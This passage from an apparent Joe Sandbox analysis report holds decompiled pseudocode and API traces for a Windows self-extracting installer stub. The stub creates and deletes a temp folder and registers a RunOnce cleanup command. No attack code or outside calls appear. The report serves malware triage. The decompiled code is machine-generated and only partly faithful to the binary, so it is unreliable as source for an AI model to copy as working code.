                              • FreeLibrary.KERNEL32(00000000), ref: 010E2FF8
                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E301C
                                • Part of subcall function 010E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F4D,?,00000002,00000000), ref: 010E5201
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                              • API String ID: 2126469477-1173327654
                              • Opcode ID: c06c194b0d319ca05f59e715d46fc9f291c5f9877d168f1c1dcaa292b5ab5e24
                              • Instruction ID: 853da6c4a40e4634c7ab7976031a0ba841307db3622d0450f6a708e4c794cb28
                              • Opcode Fuzzy Hash: c06c194b0d319ca05f59e715d46fc9f291c5f9877d168f1c1dcaa292b5ab5e24
                              • Instruction Fuzzy Hash: 9B41DA31A002058EEB71AB3B9D5C69A3FE8BB54B54F0440A9FAD1CF145EB7AC980CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 478 10e5467-10e5484 479 10e551c-10e5528 call 10e1680 478->479 480 10e548a-10e5490 call 10e53a1 478->480 484 10e552d-10e5539 call 10e58c8 479->484 483 10e5495-10e5497 480->483 485 10e549d-10e54c0 call 10e1781 483->485 486 10e5581-10e5583 483->486 493 10e554d-10e5552 484->493 494 10e553b-10e5545 CreateDirectoryA 484->494 499 10e550c-10e551a call 10e658a 485->499 500 10e54c2-10e54d8 GetSystemInfo 485->500 489 10e558d-10e559d call 10e6ce0 486->489 497 10e5554-10e5557 call 10e597d 493->497 498 10e5585-10e558b 493->498 495 10e5577-10e557c call 10e6285 494->495 496 10e5547 494->496 495->486 496->493 507 10e555c-10e555e 497->507 498->489 499->484 505 10e54fe 500->505 506 10e54da-10e54dd 500->506 508 10e5503-10e5507 call 10e658a 505->508 511 10e54df-10e54e2 506->511 512 10e54f7-10e54fc 506->512 507->498 515 10e5560-10e5566 507->515 508->499 513 10e54e4-10e54e7 511->513 514 10e54f0-10e54f5 511->514 512->508 513->499 517 10e54e9-10e54ee 513->517 514->508 515->486 518 10e5568-10e5575 RemoveDirectoryA 515->518 517->508 518->486
                              C-Code - Quality: 75%
                              			E010E5467(CHAR* __ecx, void* __edx, char* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				struct _SYSTEM_INFO _v304;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t10;
                              				void* _t13;
                              				intOrPtr _t14;
                              				void* _t16;
                              				void* _t20;
                              				signed int _t26;
                              				void* _t28;
                              				void* _t29;
                              				CHAR* _t48;
                              				signed int _t49;
                              				intOrPtr _t61;
                              
                              				_t10 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t10 ^ _t49;
                              				_push(__ecx);
                              				if(__edx == 0) {
                              					_t48 = 0x10e91e4;
                              					_t42 = 0x104;
                              					E010E1680(0x10e91e4, 0x104);
                              					L14:
                              					_t13 = E010E58C8(_t48); // executed
                              					if(_t13 != 0) {
                              						L17:
                              						_t42 = _a4;
                              						if(_a4 == 0) {
                              							L23:
                              							 *0x10e9124 = 0;
                              							_t14 = 1;
                              							L24:
                              							return E010E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                              						}
                              						_t16 = E010E597D(_t48, _t42, 1, 0); // executed
                              						if(_t16 != 0) {
                              							goto L23;
                              						}
                              						_t61 =  *0x10e8a20; // 0x0
                              						if(_t61 != 0) {
                              							 *0x10e8a20 = 0;
                              							RemoveDirectoryA(_t48);
                              						}
                              						L22:
                              						_t14 = 0;
                              						goto L24;
                              					}
                              					if(CreateDirectoryA(_t48, 0) == 0) {
                              						 *0x10e9124 = E010E6285();
                              						goto L22;
                              					}
                              					 *0x10e8a20 = 1;
                              					goto L17;
                              				}
                              				_t42 =  &_v268;
                              				_t20 = E010E53A1(__ecx,  &_v268); // executed
                              				if(_t20 == 0) {
                              					goto L22;
                              				}
                              				_push(__ecx);
                              				_t48 = 0x10e91e4;
                              				E010E1781(0x10e91e4, 0x104, __ecx,  &_v268);
                              				if(( *0x10e9a34 & 0x00000020) == 0) {
                              					L12:
                              					_t42 = 0x104;
                              					E010E658A(_t48, 0x104, 0x10e1140);
                              					goto L14;
                              				}
                              				GetSystemInfo( &_v304);
                              				_t26 = _v304.dwOemId & 0x0000ffff;
                              				if(_t26 == 0) {
                              					_push("i386");
                              					L11:
                              					E010E658A(_t48, 0x104);
                              					goto L12;
                              				}
                              				_t28 = _t26 - 1;
                              				if(_t28 == 0) {
                              					_push("mips");
                              					goto L11;
                              				}
                              				_t29 = _t28 - 1;
                              				if(_t29 == 0) {
                              					_push("alpha");
                              					goto L11;
                              				}
                              				if(_t29 != 1) {
                              					goto L12;
                              				}
                              				_push("ppc");
                              				goto L11;
                              			}




















                              0x010e5472
                              0x010e5479
                              0x010e5481
                              0x010e5484
                              0x010e551c
                              0x010e5521
                              0x010e5528
                              0x010e552d
                              0x010e552f
                              0x010e5539
                              0x010e554d
                              0x010e554d
                              0x010e5552
                              0x010e5585
                              0x010e5585
                              0x010e558b
                              0x010e558d
                              0x010e559d
                              0x010e559d
                              0x010e5557
                              0x010e555e
                              0x00000000
                              0x00000000
                              0x010e5560
                              0x010e5566
                              0x010e5569
                              0x010e556f
                              0x010e556f
                              0x010e5581
                              0x010e5581
                              0x00000000
                              0x010e5581
                              0x010e5545
                              0x010e557c
                              0x00000000
                              0x010e557c
                              0x010e5547
                              0x00000000
                              0x010e5547
                              0x010e548a
                              0x010e5490
                              0x010e5497
                              0x00000000
                              0x00000000
                              0x010e549d
                              0x010e54ab
                              0x010e54b4
                              0x010e54c0
                              0x010e550c
                              0x010e5511
                              0x010e5515
                              0x00000000
                              0x010e5515
                              0x010e54c9
                              0x010e54d6
                              0x010e54d8
                              0x010e54fe
                              0x010e5503
                              0x010e5507
                              0x00000000
                              0x010e5507
                              0x010e54da
                              0x010e54dd
                              0x010e54f7
                              0x00000000
                              0x010e54f7
                              0x010e54df
                              0x010e54e2
                              0x010e54f0
                              0x00000000
                              0x010e54f0
                              0x010e54e7
                              0x00000000
                              0x00000000
                              0x010e54e9
                              0x00000000

                              APIs
                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E54C9
                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E553D
                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E556F
                                • Part of subcall function 010E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E53FB
                                • Part of subcall function 010E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5402
                                • Part of subcall function 010E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E541F
                                • Part of subcall function 010E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E542B
                                • Part of subcall function 010E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5434
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                              • API String ID: 1979080616-3374052426
                              • Opcode ID: 7a1ea6c6e6ea6caf80fccfc256f5edd9b8762e3fec6cb53d432a369abab55730
                              • Instruction ID: 9b9a80047c23990354c4d8017fe03c868fc2a731c7b6f9888b3d664ad6fec8d0
                              • Opcode Fuzzy Hash: 7a1ea6c6e6ea6caf80fccfc256f5edd9b8762e3fec6cb53d432a369abab55730
                              • Instruction Fuzzy Hash: AA313876B002019FDB249B3B9C1C5BE7BEAAB9570CF0448AEE5C2C7644DA75CA018B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 86%
                              			E010E2390(CHAR* __ecx) {
                              				signed int _v8;
                              				char _v276;
                              				char _v280;
                              				char _v284;
                              				struct _WIN32_FIND_DATAA _v596;
                              				struct _WIN32_FIND_DATAA _v604;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t21;
                              				int _t36;
                              				void* _t46;
                              				void* _t62;
                              				void* _t63;
                              				CHAR* _t65;
                              				void* _t66;
                              				signed int _t67;
                              				signed int _t69;
                              
                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                              				_t21 =  *0x10e8004; // 0x9fdbf5b5
                              				_t22 = _t21 ^ _t69;
                              				_v8 = _t21 ^ _t69;
                              				_t65 = __ecx;
                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                              					L10:
                              					_pop(_t62);
                              					_pop(_t66);
                              					_pop(_t46);
                              					return E010E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                              				} else {
                              					E010E1680( &_v276, 0x104, __ecx);
                              					_t58 = 0x104;
                              					E010E16B3( &_v280, 0x104, "*");
                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                              					_t63 = _t22;
                              					if(_t63 == 0xffffffff) {
                              						goto L10;
                              					} else {
                              						goto L3;
                              					}
                              					do {
                              						L3:
                              						_t58 = 0x104;
                              						E010E1680( &_v276, 0x104, _t65);
                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                              							_t58 = 0x104;
                              							E010E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                              							SetFileAttributesA( &_v280, 0x80);
                              							DeleteFileA( &_v280);
                              						} else {
                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                              								E010E16B3( &_v276, 0x104,  &(_v596.cFileName));
                              								_t58 = 0x104;
                              								E010E658A( &_v280, 0x104, 0x10e1140);
                              								E010E2390( &_v284);
                              							}
                              						}
                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                              					} while (_t36 != 0);
                              					FindClose(_t63); // executed
                              					_t22 = RemoveDirectoryA(_t65); // executed
                              					goto L10;
                              				}
                              			}





















                              0x010e2398
                              0x010e239e
                              0x010e23a3
                              0x010e23a5
                              0x010e23ae
                              0x010e23b3
                              0x010e24cb
                              0x010e24d2
                              0x010e24d3
                              0x010e24d4
                              0x010e24df
                              0x010e23c2
                              0x010e23d1
                              0x010e23db
                              0x010e23e4
                              0x010e23f6
                              0x010e23fc
                              0x010e2401
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e2407
                              0x010e2407
                              0x010e2408
                              0x010e2411
                              0x010e241f
                              0x010e247a
                              0x010e2483
                              0x010e2495
                              0x010e24a3
                              0x010e2421
                              0x010e242f
                              0x010e2453
                              0x010e245d
                              0x010e2466
                              0x010e2472
                              0x010e2472
                              0x010e242f
                              0x010e24af
                              0x010e24b5
                              0x010e24be
                              0x010e24c5
                              0x00000000
                              0x010e24c5

                              APIs
                              • FindFirstFileA.KERNELBASE(?,010E8A3A,010E11F4,010E8A3A,00000000,?,?), ref: 010E23F6
                              • lstrcmpA.KERNEL32(?,010E11F8), ref: 010E2427
                              • lstrcmpA.KERNEL32(?,010E11FC), ref: 010E243B
                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010E2495
                              • DeleteFileA.KERNEL32(?), ref: 010E24A3
                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010E24AF
                              • FindClose.KERNELBASE(00000000), ref: 010E24BE
                              • RemoveDirectoryA.KERNELBASE(010E8A3A), ref: 010E24C5
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                              • String ID:
                              • API String ID: 836429354-0
                              • Opcode ID: 531053fb93c78579198812fe796480c4181b047cb8c695d6a26e6161e3fc714d
                              • Instruction ID: f3b24f1195a857144386457aedbe47beda473108b88a30a1147442ca3bf8cf12
                              • Opcode Fuzzy Hash: 531053fb93c78579198812fe796480c4181b047cb8c695d6a26e6161e3fc714d
                              • Instruction Fuzzy Hash: C331A1723046409FD330EAA6CC8DAEB77ECAFC8701F04492DA5D58B140EF3899098B52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 70%
                              			E010E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				long _t4;
                              				void* _t6;
                              				intOrPtr _t7;
                              				void* _t9;
                              				struct HINSTANCE__* _t12;
                              				intOrPtr* _t17;
                              				signed char _t19;
                              				intOrPtr* _t21;
                              				void* _t22;
                              				void* _t24;
                              				intOrPtr _t32;
                              
                              				_t4 = GetVersion();
                              				if(_t4 >= 0 && _t4 >= 6) {
                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                              					if(_t12 != 0) {
                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                              						if(_t21 != 0) {
                              							_t17 = _t21;
                              							 *0x10ea288(0, 1, 0, 0);
                              							 *_t21();
                              							_t29 = _t24 - _t24;
                              							if(_t24 != _t24) {
                              								_t17 = 4;
                              								asm("int 0x29");
                              							}
                              						}
                              					}
                              				}
                              				_t20 = _a12;
                              				_t18 = _a4;
                              				 *0x10e9124 = 0;
                              				if(E010E2CAA(_a4, _a12, _t29, _t17) != 0) {
                              					_t9 = E010E2F1D(_t18, _t20); // executed
                              					_t22 = _t9; // executed
                              					E010E52B6(0, _t18, _t21, _t22); // executed
                              					if(_t22 != 0) {
                              						_t32 =  *0x10e8a3a; // 0x0
                              						if(_t32 == 0) {
                              							_t19 =  *0x10e9a2c; // 0x0
                              							if((_t19 & 0x00000001) != 0) {
                              								E010E1F90(_t19, _t21, _t22);
                              							}
                              						}
                              					}
                              				}
                              				_t6 =  *0x10e8588; // 0x0
                              				if(_t6 != 0) {
                              					CloseHandle(_t6);
                              				}
                              				_t7 =  *0x10e9124; // 0x0
                              				return _t7;
                              			}


















                              0x010e2c03
                              0x010e2c0d
                              0x010e2c18
                              0x010e2c20
                              0x010e2c2e
                              0x010e2c32
                              0x010e2c36
                              0x010e2c3d
                              0x010e2c43
                              0x010e2c45
                              0x010e2c47
                              0x010e2c49
                              0x010e2c4e
                              0x010e2c4e
                              0x010e2c47
                              0x010e2c32
                              0x010e2c20
                              0x010e2c50
                              0x010e2c54
                              0x010e2c57
                              0x010e2c64
                              0x010e2c66
                              0x010e2c6b
                              0x010e2c6d
                              0x010e2c74
                              0x010e2c76
                              0x010e2c7c
                              0x010e2c7e
                              0x010e2c87
                              0x010e2c89
                              0x010e2c89
                              0x010e2c87
                              0x010e2c7c
                              0x010e2c74
                              0x010e2c8e
                              0x010e2c95
                              0x010e2c98
                              0x010e2c98
                              0x010e2c9e
                              0x010e2ca7

                              APIs
                              • GetVersion.KERNEL32(?,00000002,00000000,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C03
                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C18
                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010E2C28
                              • CloseHandle.KERNEL32(00000000,?,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Handle$AddressCloseModuleProcVersion
                              • String ID: HeapSetInformation$Kernel32.dll
                              • API String ID: 62482547-3460614246
                              • Opcode ID: ffd37f8d9d7ac43b81733c5afff126f1b58dfa10c66c56bfea9208dd71540d71
                              • Instruction ID: 1d48701aa665d387c2c3b06bbc4c3469eee0372eae773036b035d141fab33b34
                              • Opcode Fuzzy Hash: ffd37f8d9d7ac43b81733c5afff126f1b58dfa10c66c56bfea9208dd71540d71
                              • Instruction Fuzzy Hash: 901106713002099FE7346BFBEC4CA6B3FDD9B88B94B040059FAC0DB244CA3AE8518760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E6F40() {
                              
                              				SetUnhandledExceptionFilter(E010E6EF0); // executed
                              				return 0;
                              			}



                              0x010e6f45
                              0x010e6f4d

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010E6F45
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 6958eb14360333b58a6a069389daf9e1eeace4cbceb1e7b99ea94bfa036dc0c7
                              • Instruction ID: 0836b0f47164795217a833360d9432150cdf74d9c3ef8bcdcf81ae55d0754bb1
                              • Opcode Fuzzy Hash: 6958eb14360333b58a6a069389daf9e1eeace4cbceb1e7b99ea94bfa036dc0c7
                              • Instruction Fuzzy Hash: A09002703511008B96201B73A91D42579D15A5EA42B8154A5B091CD588DB6680405611
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 93%
                              			E010E202A(struct HINSTANCE__* __edx) {
                              				signed int _v8;
                              				char _v268;
                              				char _v528;
                              				void* _v532;
                              				int _v536;
                              				int _v540;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t28;
                              				long _t36;
                              				long _t41;
                              				struct HINSTANCE__* _t46;
                              				intOrPtr _t49;
                              				intOrPtr _t50;
                              				CHAR* _t54;
                              				void _t56;
                              				signed int _t66;
                              				intOrPtr* _t72;
                              				void* _t73;
                              				void* _t75;
                              				void* _t80;
                              				intOrPtr* _t81;
                              				void* _t86;
                              				void* _t87;
                              				void* _t90;
                              				_Unknown_base(*)()* _t91;
                              				signed int _t93;
                              				void* _t94;
                              				void* _t95;
                              
                              				_t79 = __edx;
                              				_t28 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t28 ^ _t93;
                              				_t84 = 0x104;
                              				memset( &_v268, 0, 0x104);
                              				memset( &_v528, 0, 0x104);
                              				_t95 = _t94 + 0x18;
                              				_t66 = 0;
                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                              				if(_t36 != 0) {
                              					L24:
                              					return E010E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                              				}
                              				_push(_t86);
                              				_t87 = 0;
                              				while(1) {
                              					E010E171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                              					_t95 = _t95 + 0x10;
                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                              					if(_t41 != 0) {
                              						break;
                              					}
                              					_t87 = _t87 + 1;
                              					if(_t87 < 0xc8) {
                              						continue;
                              					}
                              					break;
                              				}
                              				if(_t87 != 0xc8) {
                              					GetSystemDirectoryA( &_v528, _t84);
                              					_t79 = _t84;
                              					E010E658A( &_v528, _t84, "advpack.dll");
                              					_t46 = LoadLibraryA( &_v528); // executed
                              					_t84 = _t46;
                              					if(_t84 == 0) {
                              						L10:
                              						if(GetModuleFileNameA( *0x10e9a3c,  &_v268, 0x104) == 0) {
                              							L17:
                              							_t36 = RegCloseKey(_v532);
                              							L23:
                              							_pop(_t86);
                              							goto L24;
                              						}
                              						L11:
                              						_t72 =  &_v268;
                              						_t80 = _t72 + 1;
                              						do {
                              							_t49 =  *_t72;
                              							_t72 = _t72 + 1;
                              						} while (_t49 != 0);
                              						_t73 = _t72 - _t80;
                              						_t81 = 0x10e91e4;
                              						do {
                              							_t50 =  *_t81;
                              							_t81 = _t81 + 1;
                              						} while (_t50 != 0);
                              						_t84 = _t73 + 0x50 + _t81 - 0x10e91e5;
                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10e91e5);
                              						if(_t90 != 0) {
                              							 *0x10e8580 = _t66 ^ 0x00000001;
                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                              							if(_t66 == 0) {
                              								_t54 = "%s /D:%s";
                              							}
                              							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              							E010E171E(_t90, _t84, _t54,  &_v268);
                              							_t75 = _t90;
                              							_t23 = _t75 + 1; // 0x1
                              							_t79 = _t23;
                              							do {
                              								_t56 =  *_t75;
                              								_t75 = _t75 + 1;
                              							} while (_t56 != 0);
                              							_t24 = _t75 - _t79 + 1; // 0x2
                              							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                              							RegCloseKey(_v532); // executed
                              							_t36 = LocalFree(_t90);
                              							goto L23;
                              						}
                              						_t79 = 0x4b5;
                              						E010E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                              						goto L17;
                              					}
                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                              					_t66 = 0 | _t91 != 0x00000000;
                              					FreeLibrary(_t84); // executed
                              					if(_t91 == 0) {
                              						goto L10;
                              					}
                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                              						E010E658A( &_v268, 0x104, 0x10e1140);
                              					}
                              					goto L11;
                              				}
                              				_t36 = RegCloseKey(_v532);
                              				 *0x10e8530 = _t66;
                              				goto L23;
                              			}

































                              0x010e202a
                              0x010e2035
                              0x010e203c
                              0x010e2041
                              0x010e2050
                              0x010e205f
                              0x010e2064
                              0x010e206f
                              0x010e208c
                              0x010e2094
                              0x010e2257
                              0x010e2266
                              0x010e2266
                              0x010e209a
                              0x010e209b
                              0x010e209d
                              0x010e20aa
                              0x010e20af
                              0x010e20c9
                              0x010e20d1
                              0x00000000
                              0x00000000
                              0x010e20d3
                              0x010e20da
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e20da
                              0x010e20e2
                              0x010e2103
                              0x010e210e
                              0x010e2116
                              0x010e2122
                              0x010e2128
                              0x010e212c
                              0x010e2179
                              0x010e2194
                              0x010e21de
                              0x010e21e4
                              0x010e2256
                              0x010e2256
                              0x00000000
                              0x010e2256
                              0x010e2196
                              0x010e2196
                              0x010e219c
                              0x010e219f
                              0x010e219f
                              0x010e21a1
                              0x010e21a2
                              0x010e21a6
                              0x010e21a8
                              0x010e21b0
                              0x010e21b0
                              0x010e21b2
                              0x010e21b3
                              0x010e21bc
                              0x010e21c7
                              0x010e21cb
                              0x010e21f1
                              0x010e21f6
                              0x010e21fd
                              0x010e21ff
                              0x010e21ff
                              0x010e2204
                              0x010e2213
                              0x010e2218
                              0x010e221d
                              0x010e221d
                              0x010e2220
                              0x010e2220
                              0x010e2222
                              0x010e2223
                              0x010e2229
                              0x010e223d
                              0x010e2249
                              0x010e2250
                              0x00000000
                              0x010e2250
                              0x010e21d2
                              0x010e21d9
                              0x00000000
                              0x010e21d9
                              0x010e213a
                              0x010e2141
                              0x010e2144
                              0x010e214c
                              0x00000000
                              0x00000000
                              0x010e2163
                              0x010e2172
                              0x010e2172
                              0x00000000
                              0x010e2163
                              0x010e20ea
                              0x010e20f0
                              0x00000000

                              APIs
                              • memset.MSVCRT ref: 010E2050
                              • memset.MSVCRT ref: 010E205F
                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010E208C
                                • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E20C9
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E20EA
                              • GetSystemDirectoryA.KERNEL32 ref: 010E2103
                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2122
                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010E2134
                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2144
                              • GetSystemDirectoryA.KERNEL32 ref: 010E215B
                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E218C
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E21C1
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E21E4
                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010E223D
                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2249
                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2250
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
